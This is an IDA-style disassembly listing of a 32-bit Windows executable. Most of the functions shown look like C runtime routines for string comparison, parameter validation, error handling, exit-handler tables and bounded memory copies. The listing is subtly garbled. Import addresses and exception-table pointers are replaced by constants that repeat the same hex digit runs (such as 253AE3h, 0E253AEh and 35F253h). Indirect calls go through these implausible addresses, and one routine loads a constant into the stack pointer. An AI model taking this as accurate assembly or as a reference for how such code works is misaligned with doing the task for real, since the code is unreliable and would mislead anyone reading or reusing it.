call sub_40109A
test byte ptr [esp+8], 1
jz short loc_402674
push esi
call sub_402F6D
pop ecx
loc_402674: ; CODE XREF: J8@F_7_S:0040266B�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_40267A proc near ; CODE XREF: sub_401337+D�p
push 44h
mov ebx, 0AE30D5h
call sub_4045CC
push 57186Ah
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push 6B8C35h
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
int 3 ; Trap to Debugger
sub_40267A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4026B9 proc near ; CODE XREF: sub_401141+13�p
; sub_4012AC+F�p
push 44h
mov ebx, 0A75C61h
call sub_4045CC
push 53AE30h
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push 29D718h
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D338
call sub_4041BB
int 3 ; Trap to Debugger
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D338
mov eax, esi
pop esi
retn 4
sub_4026B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402710 proc near ; CODE XREF: sub_401C1D+9A�p
; sub_401CC0+1B7�p ...
cmp ecx, ds:dword_423064
jnz short loc_40271A
rep retn
; ---------------------------------------------------------------------------
loc_40271A: ; CODE XREF: sub_402710+6�j
jmp sub_40468E
sub_402710 endp
; =============== S U B R O U T I N E =======================================
sub_40271F proc near ; CODE XREF: sub_4027D6+D�p
; sub_4028F9+1A�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 0
jnz short loc_402791
call sub_40539D
mov [esi+8], eax
mov ecx, [eax+6Ch]
mov [esi], ecx
mov ecx, [eax+68h]
mov [esi+4], ecx
mov ecx, [esi]
cmp ecx, ds:off_423678
jz short loc_40275D
mov ecx, ds:dword_423594
test [eax+70h], ecx
jnz short loc_40275D
call sub_4050B1
mov [esi], eax
loc_40275D: ; CODE XREF: sub_40271F+2A�j
; sub_40271F+35�j
mov eax, [esi+4]
cmp eax, ds:off_423498
jz short loc_40277E
mov eax, [esi+8]
mov ecx, ds:dword_423594
test [eax+70h], ecx
jnz short loc_40277E
call sub_4049A0
mov [esi+4], eax
loc_40277E: ; CODE XREF: sub_40271F+47�j
; sub_40271F+55�j
mov eax, [esi+8]
test byte ptr [eax+70h], 2
jnz short loc_40279B
or dword ptr [eax+70h], 2
mov byte ptr [esi+0Ch], 1
jmp short loc_40279B
; ---------------------------------------------------------------------------
loc_402791: ; CODE XREF: sub_40271F+D�j
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
loc_40279B: ; CODE XREF: sub_40271F+66�j
; sub_40271F+70�j
mov eax, esi
pop esi
retn 4
sub_40271F endp
; =============== S U B R O U T I N E =======================================
sub_4027A1 proc near ; CODE XREF: sub_4027D6+86�p
; sub_4028A9+39�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
push edi
loc_4027AB: ; CODE XREF: sub_4027A1+2E�j
movzx eax, byte ptr [esi]
lea ecx, [eax-41h]
inc esi
cmp ecx, 19h
ja short loc_4027BA
add eax, 20h
loc_4027BA: ; CODE XREF: sub_4027A1+14�j
movzx ecx, byte ptr [edx]
lea edi, [ecx-41h]
inc edx
cmp edi, 19h
ja short loc_4027C9
add ecx, 20h
loc_4027C9: ; CODE XREF: sub_4027A1+23�j
test eax, eax
jz short loc_4027D1
cmp eax, ecx
jz short loc_4027AB
loc_4027D1: ; CODE XREF: sub_4027A1+2A�j
pop edi
sub eax, ecx
pop esi
retn
sub_4027A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027D6 proc near ; CODE XREF: sub_4028A9+45�p
; sub_40E79A+8F�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_10]
call sub_40271F
xor ebx, ebx
cmp [ebp+arg_0], ebx
jnz short loc_40281D
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402813
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402813: ; CODE XREF: sub_4027D6+34�j
mov eax, 7FFFFFFFh
jmp loc_4028A6
; ---------------------------------------------------------------------------
loc_40281D: ; CODE XREF: sub_4027D6+17�j
push edi
mov edi, [ebp+arg_4]
cmp edi, ebx
jnz short loc_402850
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402849
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402849: ; CODE XREF: sub_4027D6+6A�j
mov eax, 7FFFFFFFh
jmp short loc_4028A5
; ---------------------------------------------------------------------------
loc_402850: ; CODE XREF: sub_4027D6+4D�j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_402865
push edi
push [ebp+arg_0]
call sub_4027A1
pop ecx
pop ecx
jmp short loc_402899
; ---------------------------------------------------------------------------
loc_402865: ; CODE XREF: sub_4027D6+80�j
push esi
loc_402866: ; CODE XREF: sub_4027D6+BC�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
add esp, 10h
inc edi
cmp esi, ebx
jz short loc_402894
cmp esi, eax
jz short loc_402866
loc_402894: ; CODE XREF: sub_4027D6+B8�j
sub esi, eax
mov eax, esi
pop esi
loc_402899: ; CODE XREF: sub_4027D6+8D�j
cmp [ebp+var_4], bl
jz short loc_4028A5
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_4028A5: ; CODE XREF: sub_4027D6+78�j
; sub_4027D6+C6�j
pop edi
loc_4028A6: ; CODE XREF: sub_4027D6+42�j
pop ebx
leave
retn
sub_4027D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028A9 proc near ; CODE XREF: sub_417676+34�p
; sub_417676+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp ds:dword_425DE0, esi
jnz short loc_4028E7
cmp [ebp+arg_0], esi
jnz short loc_4028DB
loc_4028BC: ; CODE XREF: sub_4028A9+35�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_4028F6
; ---------------------------------------------------------------------------
loc_4028DB: ; CODE XREF: sub_4028A9+11�j
cmp [ebp+arg_4], esi
jz short loc_4028BC
pop esi
pop ebp
jmp sub_4027A1
; ---------------------------------------------------------------------------
loc_4028E7: ; CODE XREF: sub_4028A9+C�j
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4027D6
add esp, 0Ch
loc_4028F6: ; CODE XREF: sub_4028A9+30�j
pop esi
pop ebp
retn
sub_4028A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028F9 proc near ; CODE XREF: sub_4029E9+51�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
jz loc_4029E2
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
cmp [ebp+arg_0], ebx
jnz short loc_40294B
loc_40291D: ; CODE XREF: sub_4028F9+57�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402941
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402941: ; CODE XREF: sub_4028F9+3F�j
mov eax, 7FFFFFFFh
jmp loc_4029E4
; ---------------------------------------------------------------------------
loc_40294B: ; CODE XREF: sub_4028F9+22�j
mov edi, [ebp+arg_4]
cmp edi, ebx
jz short loc_40291D
mov esi, 7FFFFFFFh
cmp [ebp+arg_8], esi
jbe short loc_402984
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402980
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402980: ; CODE XREF: sub_4028F9+7E�j
mov eax, esi
jmp short loc_4029E4
; ---------------------------------------------------------------------------
loc_402984: ; CODE XREF: sub_4028F9+61�j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_4029A9
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_405820
add esp, 0Ch
loc_40299B: ; CODE XREF: sub_4028F9+E7�j
cmp [ebp+var_4], bl
jz short loc_4029E4
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_4029E4
; ---------------------------------------------------------------------------
loc_4029A9: ; CODE XREF: sub_4028F9+91�j
; sub_4028F9+E1�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
add esp, 10h
inc edi
dec [ebp+arg_8]
jz short loc_4029DC
cmp esi, ebx
jz short loc_4029DC
cmp esi, eax
jz short loc_4029A9
loc_4029DC: ; CODE XREF: sub_4028F9+D9�j
; sub_4028F9+DD�j
sub esi, eax
mov eax, esi
jmp short loc_40299B
; ---------------------------------------------------------------------------
loc_4029E2: ; CODE XREF: sub_4028F9+E�j
xor eax, eax
loc_4029E4: ; CODE XREF: sub_4028F9+4D�j
; sub_4028F9+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4028F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029E9 proc near ; CODE XREF: sub_419A9F+D3�p
; sub_419C6D+176�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp ds:dword_425DE0, esi
jnz short loc_402A30
cmp [ebp+arg_0], esi
jnz short loc_402A1B
loc_4029FC: ; CODE XREF: sub_4029E9+35�j
; sub_4029E9+3E�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_402A42
; ---------------------------------------------------------------------------
loc_402A1B: ; CODE XREF: sub_4029E9+11�j
cmp [ebp+arg_4], esi
jz short loc_4029FC
cmp [ebp+arg_8], 7FFFFFFFh
ja short loc_4029FC
pop esi
pop ebp
jmp sub_405820
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_4029E9+C�j
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4028F9
add esp, 10h
loc_402A42: ; CODE XREF: sub_4029E9+30�j
pop esi
pop ebp
retn
sub_4029E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A45 proc near ; CODE XREF: sub_402D09+36�p
; sub_416F86+4C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push 14EB8Ch
call __SEH_prolog4
xor eax, eax
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
setnz al
cmp eax, edi
jnz short loc_402A7E
call sub_4057D3
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402AD1
; ---------------------------------------------------------------------------
loc_402A7E: ; CODE XREF: sub_402A45+1A�j
cmp ds:dword_434DF4, 3
jnz short loc_402ABF
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405B25
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_402AAB
mov esi, [ebx-4]
sub esi, 9
mov [ebp+var_1C], esi
jmp short loc_402AAE
; ---------------------------------------------------------------------------
loc_402AAB: ; CODE XREF: sub_402A45+59�j
mov esi, [ebp+var_1C]
loc_402AAE: ; CODE XREF: sub_402A45+64�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402ADF
cmp [ebp+var_20], edi
jnz short loc_402ACF
loc_402ABF: ; CODE XREF: sub_402A45+40�j
push ebx
push edi
push ds:dword_425F68
call dword ptr ds:4A75C6h
mov esi, eax
loc_402ACF: ; CODE XREF: sub_402A45+78�j
mov eax, esi
loc_402AD1: ; CODE XREF: sub_402A45+37�j
call __SEH_epilog4
retn
sub_402A45 endp
; =============== S U B R O U T I N E =======================================
sub_402AD7 proc near ; DATA XREF: J8@F_7_S:00421320�o
xor edi, edi
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_402AD7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402ADF proc near ; CODE XREF: sub_402A45+70�p
push 4
call sub_40591F
pop ecx
retn
sub_402ADF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AE8 proc near ; CODE XREF: sub_419EA0+54�p
jmp dword ptr ds:253AE3h
sub_402AE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AEE proc near ; CODE XREF: sub_40177B+FE�p
; sub_40177B+12F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_402B19
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402B98
; ---------------------------------------------------------------------------
loc_402B19: ; CODE XREF: sub_402AEE+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_402B45
cmp esi, ebx
jnz short loc_402B45
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402B97
; ---------------------------------------------------------------------------
loc_402B45: ; CODE XREF: sub_402AEE+34�j
; sub_402AEE+38�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_402B54
mov [ebp+var_1C], ecx
loc_402B54: ; CODE XREF: sub_402AEE+61�j
push edi
lea eax, [ebp+arg_C]
push eax
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4069D7
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_402B96
dec [ebp+var_1C]
js short loc_402B88
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_402B94
; ---------------------------------------------------------------------------
loc_402B88: ; CODE XREF: sub_402AEE+91�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_402B94: ; CODE XREF: sub_402AEE+98�j
mov eax, edi
loc_402B96: ; CODE XREF: sub_402AEE+8C�j
pop edi
loc_402B97: ; CODE XREF: sub_402AEE+55�j
pop esi
loc_402B98: ; CODE XREF: sub_402AEE+29�j
pop ebx
leave
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B9B proc near ; CODE XREF: sub_416F86+15F�p
; sub_416F86+167�p ...
jmp sub_402F6D
sub_402B9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BA0 proc near ; CODE XREF: sub_40101C+F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push esi
push edi
xor edi, edi
cmp eax, edi
jz short loc_402BF5
cmp [ebp+arg_0], edi
jnz short loc_402BCE
loc_402BB3: ; CODE XREF: sub_402BA0+31�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_402BBD: ; CODE XREF: sub_402BA0+44�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_402BF7
; ---------------------------------------------------------------------------
loc_402BCE: ; CODE XREF: sub_402BA0+11�j
cmp [ebp+arg_8], edi
jz short loc_402BB3
cmp [ebp+arg_4], eax
jnb short loc_402BE6
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402BBD
; ---------------------------------------------------------------------------
loc_402BE6: ; CODE XREF: sub_402BA0+36�j
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407370
add esp, 0Ch
loc_402BF5: ; CODE XREF: sub_402BA0+C�j
xor eax, eax
loc_402BF7: ; CODE XREF: sub_402BA0+2C�j
pop edi
pop esi
pop ebp
retn
sub_402BA0 endp
; =============== S U B R O U T I N E =======================================
sub_402BFB proc near ; CODE XREF: sub_401065+11�p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_41D36C
retn
sub_402BFB endp
; =============== S U B R O U T I N E =======================================
sub_402C0C proc near ; CODE XREF: sub_4015ED+2F�p
; sub_40BA07+15D�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, ecx
mov dword ptr [edi], offset off_41D36C
mov eax, [ebx]
test eax, eax
jz short loc_402C47
push eax
call sub_404130
mov esi, eax
inc esi
push esi
call sub_4036E0
test eax, eax
pop ecx
pop ecx
mov [edi+4], eax
jz short loc_402C4B
push dword ptr [ebx]
push esi
push eax
call sub_4076D5
add esp, 0Ch
jmp short loc_402C4B
; ---------------------------------------------------------------------------
loc_402C47: ; CODE XREF: sub_402C0C+13�j
and dword ptr [edi+4], 0
loc_402C4B: ; CODE XREF: sub_402C0C+2B�j
; sub_402C0C+39�j
mov dword ptr [edi+8], 1
mov eax, edi
pop edi
pop esi
pop ebx
retn 4
sub_402C0C endp
; =============== S U B R O U T I N E =======================================
sub_402C5A proc near ; CODE XREF: sub_403032+A�p
arg_0 = dword ptr 4
mov eax, ecx
mov ecx, [esp+arg_0]
mov dword ptr [eax], offset off_41D36C
mov ecx, [ecx]
and dword ptr [eax+8], 0
mov [eax+4], ecx
retn 8
sub_402C5A endp
; =============== S U B R O U T I N E =======================================
sub_402C72 proc near ; CODE XREF: sub_4013E6+15�p
; sub_4015ED+51�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D36C
mov eax, [ebx+8]
mov [esi+8], eax
test eax, eax
mov eax, [ebx+4]
push edi
jz short loc_402CBF
test eax, eax
jz short loc_402CB9
push eax
call sub_404130
mov edi, eax
inc edi
push edi
call sub_4036E0
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_402CC2
push dword ptr [ebx+4]
push edi
push eax
call sub_4076D5
add esp, 0Ch
jmp short loc_402CC2
; ---------------------------------------------------------------------------
loc_402CB9: ; CODE XREF: sub_402C72+1E�j
and dword ptr [esi+4], 0
jmp short loc_402CC2
; ---------------------------------------------------------------------------
loc_402CBF: ; CODE XREF: sub_402C72+1A�j
mov [esi+4], eax
loc_402CC2: ; CODE XREF: sub_402C72+36�j
; sub_402C72+45�j ...
pop edi
mov eax, esi
pop esi
pop ebx
retn 4
sub_402C72 endp
; =============== S U B R O U T I N E =======================================
sub_402CCA proc near ; CODE XREF: sub_401038+6�j
; J8@F_7_S:0040104C�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_41D36C
jz short locret_402CDF
push dword ptr [ecx+4]
call sub_403603
pop ecx
locret_402CDF: ; CODE XREF: sub_402CCA+A�j
retn
sub_402CCA endp
; =============== S U B R O U T I N E =======================================
sub_402CE0 proc near ; DATA XREF: J8@F_7_S:0041D318�o
; J8@F_7_S:0041D370�o ...
mov eax, [ecx+4]
test eax, eax
jnz short locret_402CEC
mov esp, 0E253AEh
locret_402CEC: ; CODE XREF: sub_402CE0+5�j
retn
sub_402CE0 endp
; ---------------------------------------------------------------------------
loc_402CED: ; DATA XREF: J8@F_7_S:off_41D36C�o
push esi
mov esi, ecx
call sub_402CCA
test byte ptr [esp+8], 1
jz short loc_402D03
push esi
call sub_402F6D
pop ecx
loc_402D03: ; CODE XREF: J8@F_7_S:00402CFA�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_402D09 proc near ; CODE XREF: sub_402DE5+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
push edi
push ds:dword_434DD0
call sub_405193
push ds:dword_434DCC
mov esi, eax
mov [esp+1Ch+var_4], esi
call sub_405193
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jb short loc_402DAE
mov ebx, edi
sub ebx, esi
lea ebp, [ebx+4]
cmp ebp, 4
jb short loc_402DAE
push esi
call sub_402A45
mov esi, eax
cmp esi, ebp
pop ecx
jnb short loc_402D95
mov ebp, 0C7C94Eh
cmp esi, eax
jnb short loc_402D56
mov eax, esi
loc_402D56: ; CODE XREF: sub_402D09+49�j
add eax, esi
cmp eax, esi
jb short loc_402D6C
push eax
push [esp+18h+var_4]
call sub_4077C2
test eax, eax
pop ecx
pop ecx
jnz short loc_402D83
loc_402D6C: ; CODE XREF: sub_402D09+51�j
lea eax, [esi+10h]
cmp eax, esi
jb short loc_402DAE
push eax
push [esp+18h+var_4]
call sub_4077C2
test eax, eax
pop ecx
pop ecx
jz short loc_402DAE
loc_402D83: ; CODE XREF: sub_402D09+61�j
sar ebx, 2
push eax
lea edi, [eax+ebx*4]
call sub_405127
pop ecx
mov ds:dword_434DD0, eax
loc_402D95: ; CODE XREF: sub_402D09+40�j
mov esi, [esp+14h+arg_0]
mov [edi], esi
add edi, 4
push edi
call sub_405127
mov ds:dword_434DCC, eax
pop ecx
mov eax, esi
jmp short loc_402DB0
; ---------------------------------------------------------------------------
loc_402DAE: ; CODE XREF: sub_402D09+27�j
; sub_402D09+33�j ...
xor eax, eax
loc_402DB0: ; CODE XREF: sub_402D09+A3�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_402D09 endp
; =============== S U B R O U T I N E =======================================
sub_402DB6 proc near ; DATA XREF: J8@F_7_S:0041D2C0�o
push esi
push 4
push 20h
call sub_40777A
mov esi, eax
push esi
call sub_405127
add esp, 0Ch
test esi, esi
mov ds:dword_434DD0, eax
mov ds:dword_434DCC, eax
jnz short loc_402DDE
push 18h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402DDE: ; CODE XREF: sub_402DB6+21�j
and dword ptr [esi], 0
xor eax, eax
pop esi
retn
sub_402DB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DE5 proc near ; CODE XREF: sub_402E21+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push 6BE4A7h
call __SEH_prolog4
call sub_4078BC
and [ebp+ms_exc.disabled], 0
push [ebp+arg_0]
call sub_402D09
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402E1B
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_402DE5 endp
; =============== S U B R O U T I N E =======================================
sub_402E1B proc near ; CODE XREF: sub_402DE5+28�p
; DATA XREF: J8@F_7_S:00421340�o
call sub_4078C5
retn
sub_402E1B endp
; =============== S U B R O U T I N E =======================================
sub_402E21 proc near ; CODE XREF: sub_40304B+45�p
; sub_407979+44�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_402DE5
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_402E21 endp
; =============== S U B R O U T I N E =======================================
sub_402E33 proc near ; CODE XREF: sub_407B19+15�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_425A80, eax
retn
sub_402E33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_402E3D proc near ; CODE XREF: sub_402F39+1F�j
; sub_405A28+21�p ...
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
push esi
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407B70
lea eax, [ebp+2A8h+var_328]
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
add esp, 0Ch
mov [ebp+2A8h+var_328], 0C000000Dh
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call dword ptr ds:35F253h
push 0
mov esi, eax
call dword ptr ds:1AF929h
lea eax, [ebp+2A8h+var_2D8]
push eax
call dword ptr ds:4D7C94h
test eax, eax
jnz short loc_402F11
test esi, esi
jnz short loc_402F11
push 2
call sub_407B65
pop ecx
loc_402F11: ; CODE XREF: sub_402E3D+C6�j
; sub_402E3D+CA�j
push 0C000000Dh
call dword ptr ds:66BE4Ah
push eax
call dword ptr ds:335F25h
mov ecx, [ebp+2A8h+var_4]
xor ecx, ebp
pop esi
call sub_402710
add ebp, 2A8h
leave
retn
sub_402E3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F39 proc near ; CODE XREF: sub_4027D6+29�p
; sub_4027D6+5F�p ...
push ebp
mov ebp, esp
push ds:dword_425A80
call sub_405193
test eax, eax
pop ecx
jz short loc_402F4F
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_402F4F: ; CODE XREF: sub_402F39+11�j
push 2
call sub_407B65
pop ecx
pop ebp
jmp sub_402E3D
sub_402F39 endp
; =============== S U B R O U T I N E =======================================
sub_402F5D proc near ; CODE XREF: sub_40164F+5�p
; sub_40164F+14�p ...
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
retn
sub_402F5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402F6D proc near ; CODE XREF: J8@F_7_S:00401059�p
; J8@F_7_S:004010D5�p ...
jmp sub_403603
sub_402F6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F72 proc near ; CODE XREF: sub_401000+F�p
; sub_403B22+84�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_C]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_402F84
loc_402F80: ; CODE XREF: sub_402F72+4B�j
xor eax, eax
jmp short loc_402FE9
; ---------------------------------------------------------------------------
loc_402F84: ; CODE XREF: sub_402F72+C�j
cmp [ebp+arg_0], edi
jnz short loc_402FA4
loc_402F89: ; CODE XREF: sub_402F72+5F�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_402F93: ; CODE XREF: sub_402F72+72�j
push edi
push edi
push edi
push edi
push edi
